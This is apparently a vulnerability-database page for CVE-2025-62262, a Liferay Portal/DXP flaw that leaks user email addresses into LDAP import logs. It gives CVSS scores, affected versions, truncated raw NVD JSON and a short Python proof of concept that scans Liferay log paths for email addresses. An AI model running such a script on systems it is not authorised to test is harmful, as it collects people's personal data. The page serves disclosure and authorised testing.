Security Vulnerability Report
中文
CVE-2025-62262 CVSS 4.4 MEDIUM

CVE-2025-62262

Published: 2025-10-27 21:15:38
Last Modified: 2025-11-10 22:03:59
Source: [email protected]

Description

Information exposure through log file vulnerability in LDAP import feature in Liferay Portal 7.4.0 through 7.4.3.97, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions allows local users to view user email address in the log files.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 through 7.4.3.97
Liferay Portal older unsupported versions
Liferay DXP 2023.Q3.1 through 2023.Q3.4
Liferay DXP 7.4 GA through update 92
Liferay DXP 7.3 GA through update 35
Liferay DXP older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62262 PoC - Liferay LDAP Import Information Disclosure # This PoC demonstrates how user email addresses may be exposed in log files import os import re def check_liferay_logs(log_paths): """ Check Liferay log files for exposed email addresses during LDAP import. Common log locations: - /opt/liferay/logs/liferay.log - /var/log/liferay/catalina.out - $LIFERAY_HOME/logs/liferay.[date].log """ email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' exposed_emails = [] for log_path in log_paths: if os.path.exists(log_path): with open(log_path, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() # Look for LDAP import related log entries with email addresses ldap_import_pattern = r'(LDAP|import|sync).*?' + email_pattern matches = re.findall(ldap_import_pattern, content, re.IGNORECASE) if matches: exposed_emails.extend(matches) return list(set(exposed_emails)) # Example usage if __name__ == "__main__": log_locations = [ "/opt/liferay/logs/liferay.log", "/var/log/liferay.log", "C:\\liferay\\logs\\liferay.log" ] print("Scanning for exposed emails in Liferay logs...") emails = check_liferay_logs(log_locations) if emails: print(f"Found {len(emails)} potentially exposed email addresses:") for email in emails: print(f" - {email}") else: print("No exposed emails found in scanned log files.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62262", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:37.577", "lastModified": "2025-11-10T22:03:58.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information exposure through log file vulnerability in LDAP import feature in Liferay Portal 7.4.0 through 7.4.3.97, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions allows local users to view user email address in the log files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:*", "matchCriteriaId": "728DF154-F19F-454C-87CA-1E755107F2A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:*", "matchCriteriaId": "35F42314-AC3F-45B6-8BF8-49811E5F2FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:*", "matchCriteriaId": "AA984F92-4C6C-4049-A731-96F587B51E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:*", "matchCriteriaId": "CADDF499-DDC4-4CEE-B512-404EA2024FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:*", "matchCriteriaId": "9EC64246-1039-4009-B9BD-7828FA0FA1C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update13:*:*:*:*:*:*", "matchCriteriaId": "D9F352AE-AE22-4A84-94B6-6621D7E0BC59"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update14:*:*:*:*:*:*", "matchCriteriaId": "3E84D881-6D47-48FD-B743-9D531F5F7D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update15:*:*:*:*:*:*", "matchCriteriaId": "1F8A9DEC-2C27-4EBB-B684-8EBDB374CFCC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update16:*:*:*:*:*:*", "matchCriteriaId": "C3E7B777-8026-4C8F-9353-B5504873E0F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update17:*:*:*:*:*:*", "matchCriteriaId": "2207FEE5-2537-4C6E-AC9C-EC53DBF3C57E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update18:*:*:*:*:*:*", "matchCriteriaId": "087A2B43-07CE-4B3D-B879-449631DDA8D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update19:*:*:*:*:*:*", "matchCriteriaId": "019CED83-6277-434C-839C-6C4E0C45FB1A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update2:*:*:*:*:*:*", "matchCriteriaId": "0ABA624F-C90B-4EAF-91E3-FCEA6997D889"}, { ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.